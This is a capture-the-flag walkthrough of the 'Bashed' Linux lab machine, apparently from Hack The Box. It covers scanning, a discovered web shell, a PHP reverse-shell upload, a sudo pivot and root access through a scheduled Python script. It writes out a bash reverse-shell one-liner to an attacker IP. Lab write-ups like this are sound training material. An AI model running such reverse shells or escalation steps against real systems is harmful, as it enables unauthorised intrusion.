Bashed machine is a vulnerable machine with Linux operating system among retired machines. Using these vulnerabilities, we are expected to obtain user and root flags.
We perform a network scan to recognize the target machine,
Classic Scan

Full port scan

As a result of the port scan, we saw that only http port 80/tcp is open and the http service is running.
Because of the http service, we continue our target enumuration through the browser.



We did enumeration on the website and did not find any information. We performed gobuster and dirbuster directory scan.


As a result of the directory scan, we detected /css, /dev, /fonts, /images, /index.html, /js, /php, /server-status, /uploads directories.
We looked in all of them and the /dev directory was the most interesting



These pages have opened us Shell as we know it
We were able to run the commands we wanted

Let’s run a bash revershell since we can run the commands we want
bash -i >& /dev/tcp/10.10.14.13/1234 0>&1
We listen to our ncat ilearakda shel before running the command.

We didn’t get any Shell ☹
Let’s try uploading Shell in the uploads section here


We went under the Uploads folder and created a file named muhammed

As we can see, if we write a file that is not here, it will give us an error. Here let’s try to upload pentest monkey’s php revershel

We loaded our Shell into the machine
Now let’s run our shelter


Ta ta ta ta we got our shel

Let’s investigate what we can run with sudo -l when we are not authorized at Shel
When we ran sudo -l we saw that we can run scrpitmanager with all root privileges

By typing the command “sudo -u scrpitmanager bash” we have authorized the user and then we saw and wrote our user flag.

When we want to access the root falge, it gives us an authorization error.

We tried to elevate authorization using the sudo -l command, we looked at it and saw that it asked us for a password and we could not access it when we did not have password information.
We provide local enumeration.

The Scripts directory attracts our attention. In the Scrpits directory, test.py and test.txt files attracted our attention

Here test.py writes to test.txt after running.

Here we delete the test.py file and create a test.py that will give us reverhsell.

On our machine we will create a python file called test.py that will generate a reverhsell
We take our python revershell in Pentest monkey, edit it and save it.


Now we make a web wervis in python to transfer the file to the destination and dowloand the file on the destination
Our attacker machine

target machine

We added our reversehle to the target machine and waited 1 minute.
Then we got our reversehel that we opened in the back.

and we were able to get a root flag